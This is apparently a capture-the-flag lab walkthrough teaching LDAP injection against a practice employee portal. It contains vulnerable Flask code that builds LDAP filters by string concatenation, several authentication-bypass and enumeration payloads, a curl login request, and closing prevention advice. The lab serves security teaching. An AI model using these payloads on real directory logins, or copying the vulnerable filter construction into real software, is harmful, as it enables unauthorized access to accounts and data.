A corporate employee portal relies on LDAP directory services for secure authentication, implementing enterprise-grade access controls. But when user input meets insufficient query sanitization, even the most trusted directory systems can become gateways to unauthorized access. 🎯 Time to test your directory injection skills against real-world authentication mechanisms!
LDAP injection occurs when user input is directly concatenated into LDAP search filters without proper sanitization. LDAP uses a specific filter syntax with operators like &
(AND), |
(OR), and !
(NOT), along with wildcards like *
.
(&(cn=username)(userPassword=password))
(&(cn={user_input})(userPassword={password_input}))
Navigate to
Test these credentials to understand normal application behavior and observe the user dashboard functionality.
The application constructs LDAP filters by directly concatenating user input:
# Vulnerable code pattern
ldap_filter = f"(&(cn={username})(userPassword={password}))"
This construction allows attackers to manipulate the filter logic by injecting LDAP operators and wildcards.
Start with simple injection attempts to understand the application's behavior:
# Try wildcard in username field
Username: *
Password: anything
# This attempts to match any user
# Try closing the filter early
Username: *)(
Password: anything
# This attempts to break filter logic
The most effective LDAP injection payload uses a wildcard to bypass authentication:
*
How this works:
(&(cn=*)(userPassword=anything))
*
matches any username in the directory# OR injection attempt
Username: admin)(|(cn=*
Password: anything
# Resulting filter:
# (&(cn=admin)(|(cn=*)(userPassword=anything))
# Early filter termination
Username: *)(*
Password: anything
# Attempts to close and reopen filter
When the wildcard injection succeeds, the application may return an administrative user account. Look for users in the IT department who have elevated privileges:
Once you successfully bypass authentication and gain administrative access:
The vulnerability exists because:
# Vulnerable Flask code
ldap_filter = f"(&(cn={username})(userPassword={password}))"
# When username = "*"
# The filter becomes:
# (&(cn=*)(userPassword=anything))
# The wildcard matches any user, bypassing authentication
# Enumerate user attributes
Username: *)(mail=*
Password: anything
# Attempts to find users with email
# Target specific departments
Username: *)(department=IT
Password: anything
# Specifically targets IT users
# Boolean-based enumeration
Username: *)(cn=a*
Password: anything
# Tests for users starting with 'a'
*
as username# POST login request
curl -X POST /login \
-d "username=*&password=test" \
-L
# Look for flag in response HTML
*
Operator | Description | Example |
---|---|---|
& | AND operation | (&(cn=user)(mail=*)) |
| | OR operation | (|(cn=admin)(cn=root)) |
! | NOT operation | (!(department=Sales)) |
* | Wildcard | (cn=*) |
= | Equality | (cn=john) |
~= | Approximate | (cn~=jon) |
LDAP injection vulnerabilities can lead to:
To prevent LDAP injection vulnerabilities:
*
, (
, )
, &
, |
* ( ) \ / NUL
and other control characters should be properly escaped or filtered from user input.Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.